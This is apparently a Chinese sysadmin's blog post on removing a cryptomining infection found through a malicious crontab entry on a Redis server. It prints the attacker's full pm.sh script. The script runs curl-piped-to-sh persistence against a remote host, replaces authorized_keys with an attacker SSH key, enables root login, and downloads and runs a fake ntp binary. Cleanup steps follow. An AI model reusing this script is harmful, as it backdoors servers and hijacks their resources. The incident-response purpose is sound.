被黑客种下恶意程序进行挖矿的排除案例

 

在查询一个redis一个rbd文件没有在指定文件目录下进行保存时发现crontab上有个定时脚本,才发现被攻击放马了

 

#crontab -l

*/10 ** * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

 

 

 

minerd是什么

minerd是挖矿程序，黑客入侵后，会利用宿主cpu进行复杂计算，强占cpu资源，使cpu使用率高达100%

下载脚本：

cat  pm.sh

exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

 

echo"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"> /var/spool/cron/root

mkdir-p /var/spool/cron/crontabs

echo"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"> /var/spool/cron/crontabs/root

 

if [ !-f "/root/.ssh/KHK75NEOiq" ]; then

       mkdir -p ~/.ssh

       rm -f ~/.ssh/authorized_keys*

       echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot" > ~/.ssh/KHK75NEOiq

       echo "PermitRootLogin yes">> /etc/ssh/sshd_config

       echo "RSAAuthentication yes">> /etc/ssh/sshd_config

       echo "PubkeyAuthentication yes">> /etc/ssh/sshd_config

       echo "AuthorizedKeysFile.ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

       /etc/init.d/sshd restart

fi

 

if [ !-f "/etc/init.d/ntp" ]; then

       if [ ! -f"/etc/systemd/system/ntp.service" ]; then

              mkdir -p /opt

              curl -fsSLhttp://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 &&chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install

       fi

fi

 

/etc/init.d/ntpstart

 

psauxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9

psauxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

 

根据以上脚本内容删除对应的程序文件及进程

需要处理以下文件及进程

1、crontab上的命令删除掉

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/root

mkdir-p /var/spool/cron/crontabs

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/crontabs/root

2、去掉ssh/authorized_keys

~/.ssh/KHK75NEOiq

被替换的/etc/ssh/sshd_config拿其他服务器上的替换掉。替换后重启sshd，记得更改root相关密码，防止黑客登陆。

 

 

3、删除相关管理的黑客程序启动文件，伪进程/etc/init.d/ntp删除并kill掉它启动的进程；

4、/usr/local/etc/minerd.conf里的minerd启动配置删除或者直接删除/usr/local/etc/minerd.conf

 

最后top看看有没有minerd及ntp进程

 

没大工高成。

 

 

参照：http://www.mamicode.com/info-detail-1443821.html